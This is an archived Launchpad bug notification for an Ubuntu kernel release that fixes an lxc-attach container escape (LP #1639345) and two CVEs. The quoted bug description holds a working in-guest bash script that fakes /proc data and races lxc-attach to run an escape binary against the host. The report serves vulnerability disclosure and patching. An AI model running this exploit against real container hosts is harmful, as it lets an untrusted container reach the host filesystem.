← Back to team overview

group.of.nepali.translators team mailing list archive

[Bug 1639345] Re: lxc-attach to malicious container allows access to host

 

This bug was fixed in the package linux - 3.19.0-75.83

---------------
linux (3.19.0-75.83) vivid; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
    - LP: #1640613

  * lxc-attach to malicious container allows access to host (LP: #1639345)
    - Revert "UBUNTU: ptrace: being capable wrt a process requires mapped
      uids/gids"
    - (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission
      checks

  * CVE-2016-8658
    - brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap()

  * CVE-2016-7425
    - scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer()

 -- Luis Henriques <luis.henriques@xxxxxxxxxxxxx>  Wed, 09 Nov 2016
22:48:56 +0000

** Changed in: linux (Ubuntu Vivid)
       Status: Fix Committed => Fix Released

** Changed in: linux (Ubuntu Xenial)
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1639345

Title:
  lxc-attach to malicious container allows access to host

Status in linux package in Ubuntu:
  Triaged
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Released
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Released
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Released
Status in lxc source package in Yakkety:
  Fix Released

Bug description:
  A malicious root user in an unprivileged container may interfere with
  lxc-attach to provide manipulated guest proc file system information
  to disable dropping of capabilities and may in the end access the host
  file system by winning a very easy race against lxc-attach.

  In guest sequence:

  cat <<EOF > /tmp/test
  #!/bin/bash -e
  rm -rf /test || true
  mkdir -p /test/sys/kernel
  echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts
  echo 0 > /test/sys/kernel/cap_last_cap
  mkdir -p /test/self
  mknod /test/self/status p
  cd /proc
  mount -o bind /test /proc
  while true; do
    pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe ->.*/\\1/')
    if [ "\${pid}" != "" ]; then
      cd /
      umount -i -f -l -n /proc
      exec /LxcAttachEscape "\${pid}" /bin/bash
    fi
    sleep 1
  done
  EOF

  See attachment for LxcAttachEscape.c

  Exploit uses fixed fd=7 for attacking, on other test environment, it
  might be other fd. Tests were performed by attacking lxc-attach
  started by

  screen lxc-attach -n [guestname]

  which is the sequence required against the TTY-stealing attacks also
  not fixed in all lxc-attach versions.

  In my opinion two bugs might need fixing:
  * lxc-attach should not use untrusted/manipulated information for proceeding
  * kernel should prevent against ptracing of lxc-attach as it was created in another USERNS

  
  # lsb_release -r -d
  Description:    Ubuntu 16.04.1 LTS
  Release:        16.04

  # apt-cache policy lxc1
  lxc1:
    Installed: 2.0.5-0ubuntu1~ubuntu16.04.2
    Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2
    Version table:
   *** 2.0.5-0ubuntu1~ubuntu16.04.2 500
          500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial-updates/main amd64 Packages
          100 /var/lib/dpkg/status
       2.0.0-0ubuntu2 500
          500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64 Packages

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions